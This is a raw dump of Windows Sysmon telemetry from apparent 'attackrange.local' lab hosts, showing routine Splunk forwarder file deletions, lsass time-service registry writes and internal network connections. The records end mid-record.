23542300x8000000000000000245340Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:46.468{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2B7E06BD35BFBC53DE6B92479B06B1F,SHA256=685D23CFCF1E799676CE17BFE13C0DBC5CA5E6018EA5B503FA505CB00EC1D083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245339Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:46.468{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB31F6A236538677A102F2295E2B659E,SHA256=A381041BD5A5B3ECE01F42DFB1AB77FC0F4142600B3AE7DE48C7D1C332B7935F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245338Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:46.343{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF59F6EEA6848CC6BED3D7704F67F292,SHA256=02E5DCAD76D36C30185B1951821C1FCC5C613366B7879EBC02129D7C5EA67697,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060713Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:47.550{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52F257C1757ED32F951CE5711C7FD872,SHA256=8EA02243AB470F34D1B365CFB653E1F250CEB4824EA5FB4FB4B01108FE329EBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245342Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:47.343{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AF677E74A0D24C2EDB4FE184D6FD4BB,SHA256=C4F22A2FC224D64B6AD9F67BA08D24977B2C6AF1056B7D369B4F3DCC070F67EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060714Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:48.925{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21917C89D76361F26708DF03B73BF26C,SHA256=6FFF6D10061675C477607758FFA81AA0DEFDAB18E7D4D670F353BAD7410BDEAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245343Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:48.343{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=475EEBC71760D95DBDB9DA8AA629CEFB,SHA256=D0B4BF7262651A67270D91152CC6555BAC4717BDDF9C178F841F455D368FF63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060715Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:49.597{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=42F409AF779C0CE35ECFE8655E51FC6B,SHA256=C7E2496E02BBA3CB46376B117D475995FB0A2FD5F14E02EB20AF62EF93BFD151,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245344Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:49.343{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED0B305E0694B1387B39ECF49C2E79E0,SHA256=F7FAE3AA4A1DF5389C81B06A59DA2FA1173C63FAA9D56AA4B3052FF16F313D3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060717Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:50.285{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97E90A370CE42322E5E854FD9174FD75,SHA256=9ABA9AA88125703B4B2C8BC87AF8A8FDDD6B4B65820C29C9A0896139E783A5EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060716Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:50.191{7F8C56E7-4E3C-6063-1100-00000000AF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=DDA888877685DDBB0A0FE7390D6148E0,SHA256=51B2EA218D07FADA78A669B8A1A0652622713C7C45E4C3DF1217CCA1F860DB99,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000245355Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:26:50.812{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000245354Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:26:50.812{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0468f761) 13241300x8000000000000000245353Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:26:50.812{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d72579-0x1b8e7fda) 13241300x8000000000000000245352Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:26:50.812{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d72581-0x7d52e7da) 13241300x8000000000000000245351Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:26:50.812{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d72589-0xdf174fda) 13241300x8000000000000000245350Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:26:50.812{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000245349Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:26:50.812{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0468f761) 13241300x8000000000000000245348Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:26:50.812{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d72579-0x1b8e7fda) 13241300x8000000000000000245347Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:26:50.812{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d72581-0x7d52e7da) 13241300x8000000000000000245346Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:26:50.812{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d72589-0xdf174fda) 23542300x8000000000000000245345Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:50.343{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3013AF517DDF84A3413079C60FC4832E,SHA256=20BAF7AF96557B54BB8B18EFA32A4852E5127B32022DCEAB9FB5133BBB832CE1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060721Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:48.864{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54757-false10.0.1.12-8000- 23542300x80000000000000001060720Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:51.644{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEB703B25F721233BC858FB7581B7C75,SHA256=1841CADC8E7A3146A15181C39A25AE246F89F031397C637CCACC996FE3BD3E17,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060719Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:51.613{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001060718Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:51.035{7F8C56E7-4E4C-6063-3300-00000000AF01}2364NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245356Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:51.375{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4530C820E8A118707D6B685825F31414,SHA256=28778BFB2A24D4F583DD4D55AA3098BC2D60006C80352E64BBEA750960B15C10,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060722Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:49.864{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54758-false10.0.1.12-8089- 23542300x8000000000000000245360Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:52.656{CB4067E1-304B-6062-1200-00000000AF01}1008NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B1F4FDA2839AA6372D77ED3B4038A4E7,SHA256=9ECD9E7E5F131BBEEF474CD1518AFE02828613BFB4BD22DD5B0671687A3BFC12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245359Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:52.422{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EAC32A8DCEDE57EC77D22E84712F76E,SHA256=274EC97BE7E4DAAC05DB51B1F090E69AAA0C433D384FF71F6B89B5D9CB1215D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245358Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:52.078{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1E347FEFFCA741DBED49D9335478ED97,SHA256=2BADBBDEED0AA9BAC8F0E113DEEA14367AFD3E9BE319B3D5B5ED8B9E19DD2FEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245357Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:52.078{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2B7E06BD35BFBC53DE6B92479B06B1F,SHA256=685D23CFCF1E799676CE17BFE13C0DBC5CA5E6018EA5B503FA505CB00EC1D083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060723Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:53.004{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAE9278D5A3C16841DAF0326D5E96EB6,SHA256=E547153A08080952CFF7267123D857DF23B7D5470D065998F45078813B55241C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245363Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:53.953{CB4067E1-30AF-6062-9800-00000000AF01}2672NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245362Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:53.453{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6E53289851B333696F97BA72B465A7E,SHA256=4242A2952F50355EC8967209DFA1A06E88ECE080CFE9F72AEE30E4D976497B36,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245361Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:51.476{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64745-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001060724Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:54.363{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DF0C99D7B57C60AA4F0FA2DD80E8ABE,SHA256=48DCBF04BEB7FE77245A8E5E72A29F69C0B424605C9A7744A39FDBCD0536B395,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245365Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:54.937{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1E347FEFFCA741DBED49D9335478ED97,SHA256=2BADBBDEED0AA9BAC8F0E113DEEA14367AFD3E9BE319B3D5B5ED8B9E19DD2FEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245364Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:54.500{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CDFB6C7E471D890C3D6F26F0C39702B,SHA256=C4B66223FE274563EA8F7D1EBC3D05882433EAE6843E038DA1D120E6E7050320,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060725Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:55.739{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2261437D48491F98C5C5F1C94F6D467,SHA256=E8406C6507A92E2A015CF9004F2F18A3AC0912210678F43F8C0688D2246BB74D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245366Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:55.547{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EBD49C1C9D6DD2AC5E7BE3D37B8FCD3,SHA256=B6DBCFE05DFF6278FE6B036CD5A9E6A3FCF2A0FD4C267EE39BF12A5114D6B11D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060726Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:54.068{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54759-false10.0.1.12-8000- 23542300x8000000000000000245368Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:56.547{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D274E9B8540D45B2065AA13C972CA3EE,SHA256=B23D2624AC931D9A1B81DEC772FE2BD0F12BCAF502ED4C6B5CB452F8387484BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245367Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:54.367{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64746-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x80000000000000001060727Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:57.098{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28B9F2E2E1D9EE4069D7AEE7F235418A,SHA256=09CF8A986FF71EE99A34C46B5CB4FBF34C4A186A06964122BB9D9E59B308A02B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245369Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:57.562{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F70B7D87116B0860C9ABA879EB925410,SHA256=D0C7719E21671574113B9E5662D6F242DE85C680DAF2027736DC5101CB234CF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060729Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:58.458{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7670974B667CE30D216317E9CFF069CC,SHA256=DA97CED533A94F392637F1A967678DF2505E239DCCB8998D3FFE937EDFF12F3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060728Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:58.458{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDE0AD2E291EF6428FB62F2EE54ABAB1,SHA256=880BA967A76B39F30CEB941109E3E4E6C6CA31532DDCAED0C9DD395D5D3C4C01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245371Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:58.562{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2941CB977BE73580ED52E25319D5D8FF,SHA256=797ED6CB8AFD5FF2619FC4AC7F5234EC4FF7A77CA14F5CD16FA2F208245A824F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245370Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:58.172{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CF66B4A915AEAE02E4517DEBD8AD564A,SHA256=63898C6893075D16844F700370BD0FD02F2904DB774753B742A41324D835D740,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060730Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:59.817{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3D54301300F459B5A5B28C1F24F7A66,SHA256=6E4B290B01A46F179A42B652075877FCAFA3CBAD72E7787D87F0EAFBEA2D5074,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245373Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:59.578{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61A842602493CF507E202F7CDEAD7E5D,SHA256=37C97364B6C119249D2C7567CD260963BA3B01BA93E6B60F9C5944310898CC10,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245372Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:57.445{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64747-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245374Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:00.594{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A28803C91AE2DC2AB5BC70D759A4AF6C,SHA256=A858078F7972BFF51807501E4041B6516E38DDF22A7CBE5642191EBBD834CE1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060731Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:01.177{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53625179C658710DF0834A2F2FBB2722,SHA256=589C7A2CF8422256982839B7D9B4F0E5EF7DE1D51C00CD59012741B9DE070D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245375Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:01.625{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70C07BCBC53F9758B532AD1AEAC364E6,SHA256=9BA3524AEE27D0DFA797F4BAB0C467501F9121414F8129AF05D083822E55C097,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060733Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:59.927{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program 